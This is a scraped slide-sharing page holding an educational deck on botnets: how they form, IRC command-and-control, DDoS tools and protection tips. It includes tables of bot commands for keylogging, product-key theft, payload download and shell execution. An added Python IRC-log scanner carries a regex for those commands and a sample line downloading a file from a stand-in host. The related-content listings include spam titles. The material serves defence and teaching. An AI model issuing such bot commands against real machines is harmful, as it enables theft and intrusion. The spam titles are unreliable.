© AR AG AS
BOTNET BATTLE
A single compromised computer can be a pain to deal with, but a
collection of compromised computers can wreak havoc around
the world.
Leaving our computer vulnerable to attack makes us a danger,
not just to ourselves but to everyone on the internet.
How do botnets work?
What’s the risk?
How can we protect ourselves?
WHAT IS A BOTNET?
The term bot is short for robot.
Criminals distribute malware that turns our computer into a bot.
Infected computers perform automated tasks over the internet without us knowing it.
Criminals use bots to infect a large number of computers.
These computers form a network which is popularly called a botnet.
RISKS OF BOTNET
Criminals use botnets to:
→ Send out spam email messages.
→ Spread viruses.
→ Attack computers + servers.
→ Commit other kinds of crime + fraud.
If our computer becomes part of a botnet, then our computer might slow down and we might be helping cyber criminals indirectly.
DEBUTS IN 2000
In the year 2000, a Canadian teenager launched
a series of distributed denial-of-service attacks
against several high-profile web sites.
The teen targeted Yahoo, Dell, eBay, Amazon and many others by flooding the sites with massive amounts of junk traffic until their servers crashed.
BOTNETS CLASSIFICATION
Botnets can be classified into two prime categories:
Legal botnets
Illegal botnets
LEGAL BOTNETS
The term botnet is widely used for several IRC bots that have been linked together and that set channel modes on other bots and users while keeping IRC channels free from unwanted users.
This is where the term originally comes from, since the first illegal botnets were similar to legal botnets.
A common bot used to set up botnets on IRC is Eggdrop.
ILLEGAL BOTNETS
Botnets sometimes infect computers whose security defences
have been violated and control granted to a third party.
Each such infected device, known as a "bot", is created when a
computer is penetrated by software from a malware distribution.
The botmaster directs the activities of these infected computers
through communication channels formed by IRC and HTTP.
WHAT IS A BOT?
A "bot" is a type of malware that allows an attacker to take
control over an affected computer.
Bots are usually part of a network of infected machines.
Since a bot-infected computer does the bidding of its master, many people refer to these victim machines as zombies.
The cybercriminals that control these bots are called
botmasters.
BOT + EXPLOIT SELECTION
Botnets typically begin when a botmaster downloads a bot program and exploit code.
Bot programs such as AgoBot, IRCBot, etc. are freely available on the internet.
Exploits for Windows OS are generally selected.
These exploits are attractive both due to the large number of exploits available and the widespread adoption of Windows amongst business + residential users.
CONTROL CHANNEL
After selecting the bot + exploit combination, the botmaster must now set up one or more control channels.
The most common technique is to use public IRC servers to
control the botnet.
The Botmaster needs a control channel in order to issue
commands to and receive feedback from the botnet.
Control channels are frequently moved to avoid detection.
INITIAL INFECTION
The botmaster must now begin to build the zombie army that will make up the botnet.
Using the chosen exploit, the Botmaster cracks and takes
control over a handful of systems.
C + C MECHANISM
COMMAND AND CONTROL MECHANISM
A collection of computers is useless without some
control mechanism.
The command and control constitutes the
interface between the botnet and the botmaster.
The botmaster commands the C&C.
The C&C commands the bots.
BOTNET WITH ZOMBIES
BOTNET STATISTICS
DOSNET
A type of botnet & mostly used as a term for malicious
botnets.
DoSnets are used for DDoS attacks which can be very
devastating.
Well-known DoSnet software includes
→ TFN2k
→ Stacheldraht
→ Trinoo.
DOSBOT
The denial of service bot is the client which is used to connect
to the network.
It’s also the software which performs any attacks.
The vast majority of the bots are written in:
→ C
→ C++
→ Java
WAREZ
Botnets can be used to steal, store, or propagate warez.
Warez constitutes any illegally obtained or pirated
software.
Bots can search hard drives for software and licenses installed on a victim's machine.
Botmasters can easily transfer it off for duplication and
distribution.
CONTROLLING BOTNET
Some of the botnet commands from the Win32 bot family:

Command        Function
.capture.      Generates and saves an image or video file.
.download.     Downloads a file from a specified URL to the victim’s computer.
.find file.    Finds files on the victim’s computer by name and returns the paths of any files found.
.getcdkeys.    Returns product keys for software installed on the victim’s computer.
.key log.      Logs the victim’s keystrokes and saves them to a file.
.open.         Opens a program, an image, or a URL in a web browser.
.procs.        Lists the processes running on the victim’s computer.
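As an added detection example (not part of the original slides): a scanner that parses raw IRC lines and flags channel messages or topics carrying the Win32 bot commands from the table, ranking channels by hit count. The log lines are constructed, and the on-the-wire spelling of the commands (leading dot, optional space, no trailing dot) is an assumption derived from the table.

```python
import re
from collections import Counter

# Command names come from the table above. The optional space covers the
# slide's ".find file." / ".key log." spelling; the exact wire format is an
# assumption. The lookbehind skips ordinary text such as "config.open()".
BOT_COMMAND = re.compile(
    r"(?<![\w.])\.(capture|download|find ?file|getcdkeys|key ?log|open|procs)\b",
    re.IGNORECASE,
)

# IRC message types whose trailing text can carry instructions to a channel.
CARRIERS = {"PRIVMSG", "NOTICE", "TOPIC", "332"}  # 332 = RPL_TOPIC


def parse_irc(line):
    """Split one raw IRC line into (prefix, command, params, trailing)."""
    line = line.rstrip("\r\n")
    prefix = ""
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = head.split()
    if not parts:
        return None
    return prefix, parts[0].upper(), parts[1:], trailing if sep else ""


def scan(lines):
    """Return one finding per carrier message that contains a listed command."""
    findings = []
    for number, raw in enumerate(lines, start=1):
        msg = parse_irc(raw)
        if msg is None:
            continue
        prefix, command, params, trailing = msg
        if command not in CARRIERS:
            continue
        hits = [m.group(1).replace(" ", "").lower()
                for m in BOT_COMMAND.finditer(trailing)]
        if not hits:
            continue
        # In a 332 reply the first parameter is the receiving nick, so pick
        # the first parameter that looks like a channel name.
        target = next((p for p in params if p.startswith(("#", "&"))),
                      params[0] if params else "")
        findings.append({
            "line": number,
            "source": prefix.split("!")[0],
            "target": target,
            "type": command,
            "commands": hits,
        })
    return findings


def summarize(findings):
    """Count hits per channel so the busiest suspected control channel is first."""
    return Counter(f["target"] for f in findings).most_common()


# Constructed sample capture (reserved example domains and addresses).
SAMPLE = [
    ":irc.example.net 332 host-7731 #updates :.download http://files.example.com/u.bin",
    ":op!op@192.0.2.10 PRIVMSG #updates :.procs",
    ":op!op@192.0.2.10 PRIVMSG #updates :.getcdkeys",
    ":alice!a@198.51.100.4 PRIVMSG #python :call config.open() before reading",
    ":bob!b@198.51.100.9 JOIN #updates",
    "PING :irc.example.net",
    ":op!op@192.0.2.10 TOPIC #lab :.key log",
]

if __name__ == "__main__":
    results = scan(SAMPLE)
    for f in results:
        print(f["line"], f["type"], f["target"], f["source"], f["commands"])
    print(summarize(results))
```

Matching on command text only works while the control channel is unencrypted; the per-channel counts are a starting point for reviewing which internal hosts joined that channel.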
HOW BOTS WORK?
Bots creep into a person’s computer in many ways.
Bots often spread themselves across the internet by looking for vulnerable, unprotected computers to infect.
When they find an exposed computer, they quickly infect the machine and then report back to their master.
Their goal is then to stay hidden until they are instructed to carry
out a task.
AUTOMATED TASKS BY BOTS
Sending
They send:
→ Spam
→ Viruses
→ Spyware

Stealing
They steal personal and private information and communicate it back to the malicious user:
→ Bank credentials
→ Credit card numbers
→ Sensitive information

Denial of Service
Launching denial of service (DoS) attacks against a specified target.

Click fraud
Fraudsters use bots to boost web advertising billings by automatically clicking on internet ads.
PROTECT AGAINST BOTS
Limit your user rights when online.
Install top-rated security software.
Increase the security settings on your browser.
Update automatically to latest system patches.
Configure your software's settings to update automatically.
Never click on attachments unless you can verify the source.
DETECTION + REMOVAL 1
RUBOTTED 2.0 BETA
Monitors our computer for potential infection and suspicious
activities associated with bots.
Protect our system by continuously monitoring our computer for
potential infection and suspicious activities with Rubotted.
→downloadcenter.trendmicro.com
DETECTION + REMOVAL 2
MALICIOUS SOFTWARE REMOVAL TOOL
Checks our computer for infection by specific, prevalent
malicious software and removes the infection if it is found.
Microsoft releases an updated version of this tool on the
second Tuesday of each month.
→microsoft.com
DETECTION + REMOVAL 3
NORTON™ POWER ERASER
Eliminates deeply embedded and difficult to remove crimeware
that traditional virus scanning doesn't always detect.
Norton Power Eraser is specially designed to aggressively target
scamware.
→security.symantec.com
MOBILE BOTNETS
Targets smartphones, attempting to gain complete
access to the device and its contents as well as
providing control to the botmaster.
Mobile botnets give admin rights over the compromised mobile devices, enabling hackers to:
→ Send e-mail or text messages
→ Make phone calls
→ Access contacts and photos, and more.
EXAMPLES OF MOBILE BOTNETS
The Dreamdroid malware that compromised the Android devices.
The iPhone SMS attack that affected iPhone + iPad devices.
The Commwarrior affected Symbian series mobile devices.
The Zitmo that targeted Blackberry users.
CONTROLLING MOBILE BOTNET
Some of the botnet commands from the iBot family:

Command                   Function
Add Phone Number(s)       Adds numbers to the forwarding list. Commands are forwarded to all bots on the list.
Set sleep interval        Sets how long the client waits before searching the P2P network for a command.
Execute shell sequence    Run a command in the shell.
Download URL              Downloads a command file from the botmasters.
PROTECT AGAINST MOBILE BOTS
Install the latest official OS for your smartphone.
Avoid pirated apps or apps from untrusted sources.
Download apps only from trusted and reputable app stores.
DETECTION + REMOVAL
BULLGUARD MOBILE SECURITY 10
Detects and removes malware.
Monitor information that is being sent and received.
Remotely manage and monitor the smartphone.
→bullguard.com
ANY QUESTIONS? 
CREDITS
Alok Roy
Arjo Ghosh
Abhishek Sahu
©
AR
AG
AS
©
AR
AG
AS

More Related Content

What's hot

Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Gaurav Sharma
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CKArpan Raval
 
Module 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxModule 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxnikshaikh786
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web ServersSam Bowne
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissanceNishaYadav177
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing Priyanka Aash
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its PreventionDinesh O Bareja
 
Cyber Security
Cyber SecurityCyber Security
Cyber SecurityRamiro Cid
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxnikshaikh786
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack  PPT by Nitin BishtDDoS Attack  PPT by Nitin Bisht
DDoS Attack PPT by Nitin BishtNitin Bisht
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationTriCorps Technologies
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTIONumme ayesha
 
Introduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsIntroduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsToño Herrera
 

What's hot (20)

DDoS Attacks
DDoS AttacksDDoS Attacks
DDoS Attacks
 
Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)Denial of Service Attacks (DoS/DDoS)
Denial of Service Attacks (DoS/DDoS)
 
Introduction to MITRE ATT&CK
Introduction to MITRE ATT&CKIntroduction to MITRE ATT&CK
Introduction to MITRE ATT&CK
 
Module 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptxModule 1- Introduction to Cybercrime.pptx
Module 1- Introduction to Cybercrime.pptx
 
Ch 10: Hacking Web Servers
Ch 10: Hacking Web ServersCh 10: Hacking Web Servers
Ch 10: Hacking Web Servers
 
Footprinting and reconnaissance
Footprinting and reconnaissanceFootprinting and reconnaissance
Footprinting and reconnaissance
 
Web Application Penetration Testing
Web Application Penetration Testing Web Application Penetration Testing
Web Application Penetration Testing
 
Hacking And Its Prevention
Hacking And Its PreventionHacking And Its Prevention
Hacking And Its Prevention
 
Ceh v5 module 02 footprinting
Ceh v5 module 02 footprintingCeh v5 module 02 footprinting
Ceh v5 module 02 footprinting
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
Module 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptxModule 2_ Cyber offenses & Cybercrime.pptx
Module 2_ Cyber offenses & Cybercrime.pptx
 
DDoS Attack PPT by Nitin Bisht
DDoS Attack  PPT by Nitin BishtDDoS Attack  PPT by Nitin Bisht
DDoS Attack PPT by Nitin Bisht
 
Botnet
BotnetBotnet
Botnet
 
Cybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your OrganizationCybersecurity Attack Vectors: How to Protect Your Organization
Cybersecurity Attack Vectors: How to Protect Your Organization
 
IP Spoofing
IP SpoofingIP Spoofing
IP Spoofing
 
Ddos attacks
Ddos attacksDdos attacks
Ddos attacks
 
PHISHING DETECTION
PHISHING DETECTIONPHISHING DETECTION
PHISHING DETECTION
 
Cyber security
Cyber securityCyber security
Cyber security
 
Denial of service
Denial of serviceDenial of service
Denial of service
 
Introduction to Cybersecurity Fundamentals
Introduction to Cybersecurity FundamentalsIntroduction to Cybersecurity Fundamentals
Introduction to Cybersecurity Fundamentals
 

Similar to BOTNET

Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Aniq Eastrarulkhair
 
20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptx20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptxSuman Garai
 
How spam change the world
How spam change the world How spam change the world
How spam change the world Farhaan Bukhsh
 
trojon horse Seminar report
 trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar reportNamanKikani
 
Types of malware threats
Types of malware threatsTypes of malware threats
Types of malware threatsEC-Council
 
“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”iosrjce
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...OWASP Delhi
 
Type of Malware and its different analysis and its types !
Type of Malware and its different analysis and its types  !Type of Malware and its different analysis and its types  !
Type of Malware and its different analysis and its types !Mohammed Jaseem Tp
 
Bot software spreads, causes new worries
Bot software spreads, causes new worriesBot software spreads, causes new worries
Bot software spreads, causes new worriesUltraUploader
 
All you know about Botnet
All you know about BotnetAll you know about Botnet
All you know about BotnetNaveen Titare
 
Botnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdfBotnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdfuzair
 

Similar to BOTNET (20)

Botnet
BotnetBotnet
Botnet
 
Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1Mcs2453 aniq mc101053-assignment1
Mcs2453 aniq mc101053-assignment1
 
Botnet
BotnetBotnet
Botnet
 
Bots and Botnet
Bots and BotnetBots and Botnet
Bots and Botnet
 
20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptx20210717-AntiBotnets-FundamentalInfoSec.pptx
20210717-AntiBotnets-FundamentalInfoSec.pptx
 
How spam change the world
How spam change the world How spam change the world
How spam change the world
 
trojon horse Seminar report
 trojon horse Seminar report trojon horse Seminar report
trojon horse Seminar report
 
How To Protect Your Website From Bot Attacks
How To Protect Your Website From Bot AttacksHow To Protect Your Website From Bot Attacks
How To Protect Your Website From Bot Attacks
 
Types of malware threats
Types of malware threatsTypes of malware threats
Types of malware threats
 
Cyber crime report
Cyber crime reportCyber crime report
Cyber crime report
 
Malware
MalwareMalware
Malware
 
Cyber crime
Cyber crimeCyber crime
Cyber crime
 
“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”“Design and Detection of Mobile Botnet Attacks”
“Design and Detection of Mobile Botnet Attacks”
 
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
Botnets - What, How and Why by Utsav Mittal @ OWASP Delhi July, 2014 Monthly ...
 
P01761113118
P01761113118P01761113118
P01761113118
 
Type of Malware and its different analysis and its types !
Type of Malware and its different analysis and its types  !Type of Malware and its different analysis and its types  !
Type of Malware and its different analysis and its types !
 
Cybersecurity -Terms.
Cybersecurity -Terms.Cybersecurity -Terms.
Cybersecurity -Terms.
 
Bot software spreads, causes new worries
Bot software spreads, causes new worriesBot software spreads, causes new worries
Bot software spreads, causes new worries
 
All you know about Botnet
All you know about BotnetAll you know about Botnet
All you know about Botnet
 
Botnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdfBotnet Attacks How They Work and How to Defend Against Them.pdf
Botnet Attacks How They Work and How to Defend Against Them.pdf
 

Recently uploaded

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWERMadyBayot
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businesspanagenda
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...apidays
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusZilliz
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...apidays
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Jeffrey Haguewood
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...apidays
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelDeepika Singh
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Zilliz
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century educationjfdjdjcjdnsjd
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsNanddeep Nachan
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024The Digital Insurer
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyKhushali Kathiriya
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...DianaGray10
 

Recently uploaded (20)

EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWEREMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
EMPOWERMENT TECHNOLOGY GRADE 11 QUARTER 2 REVIEWER
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
Apidays Singapore 2024 - Scalable LLM APIs for AI and Generative AI Applicati...
 
A Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source MilvusA Beginners Guide to Building a RAG App Using Open Source Milvus
A Beginners Guide to Building a RAG App Using Open Source Milvus
 
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
Apidays New York 2024 - The Good, the Bad and the Governed by David O'Neill, ...
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot ModelNavi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
Navi Mumbai Call Girls 🥰 8617370543 Service Offer VIP Hot Model
 
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
Emergent Methods: Multi-lingual narrative tracking in the news - real-time ex...
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
presentation ICT roal in 21st century education
presentation ICT roal in 21st century educationpresentation ICT roal in 21st century education
presentation ICT roal in 21st century education
 
MS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectorsMS Copilot expands with MS Graph connectors
MS Copilot expands with MS Graph connectors
 
Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024Manulife - Insurer Transformation Award 2024
Manulife - Insurer Transformation Award 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 

BOTNET

  • 4. BOTNET BATTLE A single compromised computer can be a pain to deal with, but a collection of compromised computers can wreak havoc around the world. Leaving our computer vulnerable to attack makes us a danger, not just to ourselves but to everyone on the internet. How do botnets work? What’s the risk? How can we protect ourselves? © AR AG AS
  • 5. WHAT IS A BOTNET? The term bot is short for robot. Criminals distribute malware turning our computer into a bot. Computers perform automated tasks over the internet without us knowing it. Criminals use bots to infect large number of computers. These computers form a network which is popularly called as botnet. © AR AG AS
  • 6. RISKS OF BOTNET Criminals use botnets to Send out spam email messages. Spread viruses. Attack computers + servers. Commit other kinds of crime + fraud. If our computer becomes part of a botnet, then our computer might slow down and we might be helping cyber criminals indirectly. © AR AG AS
  • 7. DEBUTS IN 2000 In the year 2000, a Canadian teenager launched a series of distributed denial-of-service attacks against several high-profile web sites. The teen targeted Yahoo, Dell, eBay, amazon and many others by flooding the sites with massive amounts of junk traffic until their servers crashed. © AR AG AS
  • 8. BOTNETS CLASSIFICATION Botnets can be classified into two prime categories: Legal botnets Illegal botnets © AR AG AS
  • 9. LEGAL BOTNETS The term botnet is widely used when several IRC bots have been linked and set channel modes on other bots and users while keeping IRC channels free from unwanted users. This is where the term is originally from, since the first illegal botnets were similar to legal botnets. A common bot used to set up botnets on IRC is eggdrop. © AR AG AS
  • 10. ILLEGAL BOTNETS Botnets sometimes infect computers whose security defences have been violated and control granted to a third party. Each such infected device, known as a "bot", is created when a computer is penetrated by software from a malware distribution. The botmaster directs the activities of these infected computers through communication channels formed by IRC and HTTP. © AR AG AS
  • 11. WHAT IS A BOT? A "bot" is a type of malware that allows an attacker to take control over an affected computer. Bots are usually part of a network of infected machines. Since a bot infected computer does the bidding of its master, many people refer to these victim machines as zombies. The cybercriminals that control these bots are called botmasters. © AR AG AS
  • 12. BOT + EXPLOIT SELECTION Botnets typically begin when Botmaster downloads a bot program and exploit code. Bot programs such as AgoBot, IRCBot, etc are freely available on the internet. Exploits for Windows OS are generally selected. These exploits are attractive both due to large number of exploits available and the widespread adoption of Windows amongst business + residential users. © AR AG AS
  • 13. CONTROL CHANNEL After selecting the bot + exploit combination, the Botmaster must now setup one or more control channels. The most common technique is to use public IRC servers to control the botnet. The Botmaster needs a control channel in order to issue commands to and receive feedback from the botnet. Control channels are frequently moved to avoid detection. © AR AG AS
  • 14. INITIAL INFECTION The Botmaster must now begin to build the zombie army that will include the botnet. Using the chosen exploit, the Botmaster cracks and takes control over a handful of systems. © AR AG AS
  • 15. C + C MECHANISM COMMAND AND CONTROL MECHANISM A collection of computers is useless without some control mechanism. The command and control constitutes the interface between the botnet and the botmaster. The botmaster commands the c&c. The c&c commands the bots. © AR AG AS
  • 18. DOSNET A type of botnet & mostly used as a term for malicious botnets. DoSnets are used for DDoS attacks which can be very devastating. Well-known DoSnet software includes → TFN2k → Stacheldraht → Trinoo. © AR AG AS
  • 19. DOSBOT The denial of service bot is the client which is used to connect to the network. It’s also the software which performs any attacks. The vast majority of the bots are written in the → C → C++ → Java © AR AG AS
  • 20. WAREZ Botnets can be used to steal, store, or propagate warez. Warez is any illegally obtained or pirated software. Bots can search hard drives for software and licenses installed on a victim's machine. Botmasters can easily transfer it off for duplication and distribution.
  • 21. CONTROLLING BOTNET Some of the botnet commands from the Win32 bot family:
      Command        Function
      .capture.      Generates and saves an image or video file.
      .download.     Downloads a file from a specified URL to the victim’s computer.
      .find file.    Finds files on the victim’s computer by name and returns the paths of any files found.
      .getcdkeys.    Returns product keys for software installed on the victim’s computer.
      .key log.      Logs the victim’s keystrokes and saves them to a file.
      .open.         Opens a program, an image, or a URL in a web browser.
      .procs.        Lists the processes running on the victim’s computer.
